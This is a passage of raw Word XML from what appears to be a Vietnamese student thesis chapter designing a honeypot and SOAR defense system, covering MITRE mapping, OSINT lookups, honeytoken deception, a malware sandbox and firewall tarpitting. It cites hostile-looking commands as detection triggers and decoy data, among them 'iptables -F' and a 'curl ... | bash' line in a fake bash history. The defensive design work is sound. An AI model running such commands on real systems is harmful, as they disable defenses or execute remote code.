                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Cách ly Sandbox + Quét VirusTotal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>cowrie.command.input (iptables -F)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>T1562.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Impair Defenses: Disable Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Gửi cảnh báo khẩn cấp cho SOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="3086100"/>
            <wp:docPr id="5" name="Picture 5"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="02_correlation_engine_flowchart.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="3086100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hình 3.2: Lưu đồ thuật toán Động cơ Tương quan Sự kiện và Ánh xạ MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3.4 Thiết kế Phân hệ Trinh sát ngược Kẻ tấn công (Reverse Intelligence Engine)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Khác với cách tiếp cận phòng thủ thụ động truyền thống (chỉ nhìn thấy IP mà không biết thông tin đối phương), Phân hệ Trinh sát ngược (Reverse Intelligence) được thiết kế để tự động thực thi chu trình điều tra tình báo nguồn mở (OSINT Pipeline) ngay trong mili-giây đầu tiên khi phát hiện IP tấn công:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. Phân giải Địa lý &amp; Nhà mạng (GeoIP &amp; ASN Profiling): Truy vấn dịch vụ phân giải địa chỉ IP để xác định quốc gia, thành phố, tọa độ địa lý, mã hệ thống tự trị (ASN) và tổ chức sở hữu dải mạng (ISP). Điều này giúp phân biệt ngay lập tức giữa các máy chủ đặt tại Datacenter (AWS, DigitalOcean, OVH) với các dải mạng người dùng băng thông rộng dân dụng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2. Tra cứu Cơ sở Dữ liệu Danh tính Mã độc Toàn cầu (AbuseIPDB Reputation API): Gửi truy vấn kiểm tra lịch sử vi phạm của IP trong vòng 90 ngày gần nhất. Hệ thống trích xuất chỉ số 'Abuse Confidence Score' (từ 0 đến 100%). Nếu điểm số &gt; 40%, IP được tự động gán nhãn là 'Known Cybercrime Infrastructure'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3. Tra cứu Thiết bị &amp; Lỗ hổng Mở (Shodan Host Intelligence API): Kết nối Shodan API để thu thập danh sách các cổng dịch vụ mở (Open Ports), các lỗ hổng CVE chưa được vá và hệ điều hành ước tính của máy chủ tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4. Kỹ thuật Quét cổng Ngược An toàn (Safe Reverse Port Probing): Module chủ động thực hiện kiểm tra bắt tay TCP 3 bước (TCP SYN Connect) tới 10 cổng then chốt của IP tấn công (21, 22, 23, 80, 443, 1080, 3128, 3389, 8080, 8888) với thời gian timeout cực ngắn (300ms). Dựa trên kết quả trả về, hệ thống phân loại chính xác hình thái đối thủ:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Nếu mở cổng 23 (Telnet) hoặc 80 (Web camera): Phân loại là 'Compromised IoT / Botnet Node (Mirai variant)'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Nếu mở cổng 1080, 3128, 8080: Phân loại là 'Anonymized Proxy / Tor Node'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Nếu điểm AbuseIPDB &gt; 75%: Phân loại là 'Automated Scanner Infrastructure'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3.5 Thiết kế Phân hệ Đánh lừa &amp; Bẫy Mồi Khử ẩn danh (Active Honeytoken Deception Engine)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Nhằm đối phó với những kẻ tấn công chuyên nghiệp sử dụng mạng ẩn danh (VPN, Tor, Proxy) để che giấu nguồn gốc khi SSH vào Honeypot, Phân hệ Active Deception Engine được thiết kế với nhiệm vụ kiến tạo một môi trường 'mồi nhử hoàn hảo' (Realistic Honey Environment):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Hệ thống tự động sinh ra và cài cắm 3 lớp tài liệu mồi nhử (Decoy Breadcrumbs):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. Fake AWS Credentials ('/root/.aws/credentials'): Giả lập tệp tin cấu hình tài khoản Amazon Web Services có quyền quản trị cao nhất đối với cụm máy chủ sao lưu cơ sở dữ liệu. Trong tệp tin này, một URL kiểm tra ngầm (Canary Endpoint) được nhúng khéo léo vào phần chú thích mã nguồn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2. Fake Bash History ('/root/.bash_history'): Giả lập lịch sử thao tác dòng lệnh của người quản trị máy chủ, trong đó chứa một câu lệnh tải bản vá bảo mật khẩn cấp (curl -s http://.../patch.sh | bash) trỏ tới máy chủ Webhook của Blue Team.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3. Fake Database Dump ('/var/backups/db_backup_2026.sql'): Giả lập tệp tin sao lưu cơ sở dữ liệu MySQL chứa các bảng tài khoản người dùng, mật khẩu quản trị và đường link truy cập vào cổng quản trị nội bộ (SSO Authentication Portal).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Nguyên lý Khử ẩn danh: Khi kẻ tấn công đánh cắp các tệp tin này và mang về máy tính cá nhân để khai thác, việc click vào đường link hoặc chạy lệnh sẽ kích hoạt một Webhook HTTP Request gửi thẳng từ máy thật của hacker về máy chủ SOC. Lúc này, toàn bộ lớp vỏ bọc VPN/Proxy mà hacker dùng để SSH vào Honeypot trước đó sẽ bị vô hiệu hóa hoàn toàn, để lộ địa chỉ IP thật và thông số hệ thống của thủ phạm.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="3086100"/>
            <wp:docPr id="6" name="Picture 6"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="03_deanonymization_sequence.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="3086100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hình 3.3: Cơ chế bẫy mồi Honeytoken và khử ẩn danh kẻ tấn công (De-anonymization)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3.6 Thiết kế Phân hệ Phân tích và Cách ly Mã độc (Malware Sandbox &amp; Staging Pipeline)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Khi kẻ tấn công sử dụng các công cụ truyền tệp tin (wget, curl, tftp, sftp) để đưa mã độc vào máy bẫy, Phân hệ Malware Staging tự động kích hoạt chu trình phân tích gồm 4 pha:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Pha 1 - Tự động Cách ly (Automated Quarantine): Mã độc được di chuyển ngay lập tức vào thư mục cô lập an toàn, gắn cờ quyền chỉ đọc (Read-only) và vô hiệu hóa quyền thực thi (chmod -x) để ngăn chặn mã độc tự kích hoạt ngoài ý muốn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Pha 2 - Tính toán Mã băm Toàn vẹn (Cryptographic Hashing): Tính toán băm MD5 và SHA256 của tệp tin để tạo ra mã nhận dạng duy nhất (Unique IOC Identifier).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Pha 3 - Trích xuất Chuỗi Tĩnh (Static String Extraction &amp; Regex Pattern Matching): Quét toàn bộ nội dung tệp tin để tìm kiếm các địa chỉ IP máy chủ C2, các tên miền độc hại, các câu lệnh tạo backdoor và nhận diện chữ ký của các dòng họ mã độc nổi tiếng (như chữ ký của Mirai botnet, Gafgyt, hoặc XMRig Miner).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Pha 4 - Tích hợp Tình báo VirusTotal API: Tự động gửi mã băm SHA256 lên nền tảng VirusTotal để tra cứu tỷ lệ nhận diện độc hại (Detection Ratio), tên phân loại mã độc theo tiêu chuẩn của các hãng diệt virus hàng đầu thế giới (Kaspersky, Microsoft, CrowdStrike).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3.7 Thiết kế Động cơ Thực thi Phản ứng SOAR (Firewall Enforcer &amp; Tarpitting)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Động cơ Thực thi SOAR (SOAR Enforcer) chuyển đổi các quyết định phân tích thành hành động tác chiến cụ thể trên hạ tầng mạng:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. Thực thi Chặn Tường lửa Động (Dynamic Firewall Enforcement): Hỗ trợ tích hợp đa nền tảng. Trên máy chủ Linux, module trực tiếp gọi tiện ích 'iptables' hoặc 'nftables' để chèn luật chặn gói tin ở mức nhân hệ điều hành: 'iptables -I INPUT -s &lt;IP&gt; -j DROP'. Trên môi trường Windows, module sử dụng 'netsh advfirewall'. Hệ thống có cơ chế kiểm tra Whitelist (danh sách trắng) để bảo vệ an toàn cho các địa chỉ IP quản trị của nhà trường/doanh nghiệp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2. Động cơ Giam lỏng Tarpit (Connection Tarpitting Engine): Khi phát hiện kẻ tấn công là một botnet quét tự động, thay vì ngắt kết nối (khiến botnet chuyển sang quét mục tiêu khác), SOAR Enforcer sử dụng cơ chế NAT chuyển hướng gói tin: 'iptables -t nat -A PREROUTING -p tcp -s &lt;IP&gt; --dport 2222 -j REDIRECT --to-ports 22222'. Tại cổng 22222, dịch vụ Endlessh Tarpit sẽ giam giữ kết nối của kẻ tấn công bằng cách truyền từng byte dữ liệu banner cách nhau 10 giây, khóa cứng tiến trình của hacker và làm kiệt quệ tài nguyên máy tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3. Xuất bản Danh sách đen Đe dọa (Threat Feed Export): Mọi địa chỉ IP bị chặn đều được tự động đồng bộ ra tệp tin chuẩn 'data/threat_intel_feed.txt' để chia sẻ cho các hệ thống tường lửa biên khác trong mạng nội bộ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3.8 Thiết kế Giao diện Giám sát &amp; Điều khiển Tương tác 2 Chiều (Telegram SOAR Bot)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Một điểm nhấn quan trọng giúp đồ án vượt xa các ứng dụng gửi thông báo thông thường là thiết kế Telegram SOAR Bot tương tác 2 chiều (Bidirectional Interactive Bot):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
